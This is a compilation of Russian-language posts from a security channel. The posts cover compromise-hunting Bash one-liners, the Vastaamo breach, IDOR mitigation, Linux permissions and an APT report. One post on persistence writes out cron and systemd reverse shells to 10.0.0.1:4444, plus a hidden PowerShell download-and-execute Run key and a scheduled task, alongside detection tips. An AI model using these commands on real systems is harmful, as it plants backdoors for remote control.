ZeroDay | Кибербезопасность

Почему Big Data стек небезопасен по своей природе Big Data - это не единая система, а связка сервисов, которые изначально не проектировались работать в одной модели безопасности. Каждый компонент окей сам по себе, но вместе появляется главное слабое место: доверие между ними и отсутствие общего контроля. ⏺В статье показывают, что уязвимости возникают на стыках: стек из HDFS, Spark, ZooKeeper и других сервисов формирует attack surface не компонентами, а их связями, а атака выглядит как перемещение по системе через легитимные механизмы. ZeroDay | Белый Хакер | #Статья

5 фишек Bash для анализа подозрительной активности на сервере 👋 Приветствую в мире цифровой безопасности! Расскажу о 5 однострочниках, которые помогают быстро найти что-то нехорошее на хосте. ⏺Ищем файлы с setuid которые появились недавно:

    
        find / -xdev -perm -4000 -newer /var/log/auth.log 2>/dev/null{}
    

Новый setuid-бинарь вне стандартных путей - почти всегда что-то не то. ⏺Смотрим какие процессы слушают порты, но не видны в стандартных утилитах:

    
        cat /proc/net/tcp6 /proc/net/tcp | awk 'NR>1 && $4=="0A" {print $2}' | while read addr; do port=$((16#${addr##*:})); echo $port; done | sort -u{}
    

Сравниваем с выводом ss -tlnp. Расхождение - признак руткита. ⏺Находим процессы, которые открыли сокет но не светятся в netstat:

    
        for pid in /proc/[0-9]*/fd; do ls -la $pid 2>/dev/null | grep socket | awk -v p=${pid%/fd} '{print p}'; done | sort -u | xargs -I{} cat {}/cmdline 2>/dev/null | tr '\0' ' ' | sort -u{}
    

⏺Проверяем кто модифицировал бинари из PATH за последние сутки:

    
        echo $PATH | tr ':' '\n' | xargs -I{} find {} -maxdepth 1 -newer /proc/1/exe -type f 2>/dev/null{}
    

Изменённый бинарь в /usr/bin или /bin после инцидента - классическая замена системных утилит. ⏺Ищем скрытые каталоги во временных директориях:

    
        find /tmp /var/tmp /dev/shm -name ".*" -type d 2>/dev/null
ls -la /tmp /var/tmp /dev/shm | grep "^\."{}
    

/dev/shm особенно популярен у малвари, там файлы живут только в памяти и не пишутся на диск. ZeroDay | Белый Хакер | #bash

Vastaamo: как пустой пароль сломал жизни 33 000 человек 👋 Приветствую в мире цифровой безопасности! Расскажу об одной из самых страшных утечек из-за её последствий. ⏺Vastaamo - финский психотерапевтический стартап, который оцифровал всё подряд: записи сессий, диагнозы, признания о суицидальных мыслях, изменах, детских травмах. Десятки тысяч людей доверяли сервису самое личное. Внутрянка включала MySQL-базу от программиста-самоучки, без шифрования, с пустым паролем root, торчащая в интернет. ⏺С 2017 по 2020 год база была открыта для любого, кто знал адрес сервера. Никакого взлома даже и не было, просто подключился и скопировал. Администрация знала об инцидентах в 2018 и 2019 году и никому не сообщила. ⏺Юлиус Кивимяки нашёл базу, скопировал и сначала написал компании. Те отказались платить. Тогда он разослал письма всем 33 000 пациентам лично: 200 евро в биткоинах за 24 часа, иначе признания уходят в открытый доступ. Некоторые заплатили. Данные утекли в даркнет всё равно. ⏺Несколько пациентов даже не пережили огласки. Vastaamo в итоге обанкротилась в 2021 году, а пострадавшие получили по 90 евро компенсации. ⏺Поймали его по-дурацки: была пьяная ссора с подругой в Париже, приехал полицейский патруль, и тут уже даже фальшивый румынский паспорт не спас. «Неприкасаемый бог хакеров» получил 6 лет и 3 месяца. Через полтора года вышел досрочно. Данные до сих пор в даркнете. ZeroDay | Серверная Админа | #история

Navely — анонимная почтовая платформа для ваших задач. Отправляйте и принимайте письма на любой ящик без использования алиасов. Используйте публичные домены с репутацией или приватизируйте собственные, создавая неограниченное количество ящиков. Для автоматизации доступна полная интеграция в ваши процессы через API. Безопасность обеспечивает Zero-Knowledge шифрование. Подробнее на сайте: перейти Наш канал: здесь

Persistence: как атакующий остаётся в системе после перезагрузки 👋 Приветствую в мире цифровой безопасности! Сегодня расскажу о технике атаки Persistence. ⏺Persistence - это техники закрепления в системе. Получить доступ мало, нужно остаться после перезагрузки, смены пароля или завершения сессии. Именно поэтому в реальных атаках закрепление идёт сразу после первоначального доступа. ⏺Самый простой вариант на Linux - cron. Задача запускается по расписанию и поднимает обратное соединение:

    
        (crontab -l 2>/dev/null; echo "*/5 * * * * bash -i >& /dev/tcp/10.0.0.1/4444 0>&1") | crontab -{}
    

Каждые пять минут жертва сама звонит атакующему. ⏺Systemd-сервис выглядит легитимнее и стартует при загрузке:

    
        cat > /etc/systemd/system/update.service <<EOF
[Unit]
Description=System Update Service

[Service]
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'
Restart=always

[Install]
WantedBy=multi-user.target
EOF

systemctl enable update.service{}
    

⏺На Windows классика - реестр. Значение в Run выполняется при каждом входе пользователя:

    
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d "powershell -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://10.0.0.1/shell.ps1')"{}
    

⏺Scheduled Task выглядит как системная задача и сложнее обнаруживается:

    
        schtasks /create /tn "WindowsUpdate" /tr "powershell -w hidden -ep bypass -f C:\temp\shell.ps1" /sc onlogon /ru System{}
    

⏺Детектируется по новым записям в автозагрузке, нестандартным сервисам и задачам планировщика. Sysmon пишет создание сервисов и изменения реестра - Event ID 12, 13 для реестра и 4697 для сервисов. ZeroDay | Серверная Админа | #persistence

Скрываем IDOR в API: как убрать перебор ID без миграции базы. Часть 2 👋 Приветствую в мире цифровой безопасности! В прошлый раз разобрали как сеть Фейстеля превращает последовательные ID в неугадываемые. А сегодня расскажу про ограничения и когда это не подходит. ⏺Это не авторизация. Стоит выписать на мониторе. Непрозрачный ID останавливает того, кто перебирает цикл for. Но не того, у кого уже есть один валидный ID из лога, Referer или расшаренного скрина. Сервер всё равно обязан проверять права на каждый запрос. ⏺Ключ - единственная точка отказа. Утёк секрет, перебор снова работает. У кого ключ, тот шифрует 1, 2, 3 и идёт по таблице подряд. Хранить строго в переменных окружения или менеджере секретов:

    
        export FEISTEL_KEY=$(openssl rand -hex 32){}
    

В репозиторий не класть никогда, при подозрении на компрометацию - ротация. ⏺Ротация ключа: меняешь ключ, меняются все публичные ID в системе. Ломаются старые URL, кэшированные ссылки, QR-коды. Если ротация реально маячит в эксплуатации, лучше смотреть в сторону HMAC-подписанных ID, где сам ID стабилен, а ротируется только подпись. ⏺Проверить что шифрование работает правильно можно простым тестом: берёшь несколько последовательных ID, шифруешь и убеждаешься что паттерн исчез:

    
        for i in range(1, 6):
    print(f"{i} -> {feistel_encode(key, i)}")

# 1 -> 5823901847263
# 2 -> 9174625038192
# 3 -> 2847193650471{}
    

ZeroDay | Белый Хакер | #Инструмент

Права в Linux: от chmod до SELinux, как на самом деле устроен доступ В Linux права доступа выглядят как простая комбинация rwx, но за этим скрывается несколько уровней логики: базовые UNIX-права, расширения через ACL и мандатные политики вроде SELinux. Если смотреть только на chmod, легко не понять, почему что-то не работает или наоборот работает слишком широко. ⏺В статье разбирается, как устроена модель user/group/other и почему это классический DAC, как читать ls -l и быстро понимать строки вроде drwxr-xr-x, как связаны символьная и восьмеричная нотации (rwx и 755) и почему права для файлов и директорий ведут себя по-разному. Показано, где базовой модели не хватает и подключается POSIX ACL, а также разобраны модели доступа: DAC, MAC через SELinux, RBAC и ABAC, и как они комбинируются в реальных системах. ZeroDay | Белый Хакер | #Статья

GopherWhisper: бэкдоры через Discord и Slack 👋 Приветствую в мире цифровой безопасности! ESET нашли новую китайскую APT, которая прячет управление прямо внутри Discord и Slack. Разбираемся. ⏺Группу назвали GopherWhisper, работают минимум с ноября 2023. Их цель - это монгольские госструктуры, подтверждённых заражений 12, но судя по трафику с серверов управления, жертв значительно больше. ⏺Весь арсенал на Go: Go просто сложнее реверсить, легко собирать под разные платформы и быстро писать новые инструменты под задачу. ⏺Самое интересное, как они выстроили C2. Никакой собственной инфраструктуры, всё через легитимные сервисы. RatGopher сидит в приватном Discord-канале и читает команды оттуда. BoxOfFriends работает ещё аккуратнее - создаёт черновики писем в Outlook через Graph API и забирает ответы из тех же черновиков. Снаружи это выглядит как обычная рабочая переписка. ⏺Цепочка такая: JabGopher запускает LaxGopher, тот тянет CompactGopher для сбора файлов. Документы фильтруются по расширениям, пакуются в ZIP, шифруются AES-CFB-128 и уходят на file.io. ⏺Атрибуция супер простая: операторы работают строго с 8 до 17 по китайскому времени, локаль в метаданных Slack тоже выставлена на CST. Не самые осторожные ребята. ZeroDay | Белый Хакер | #атака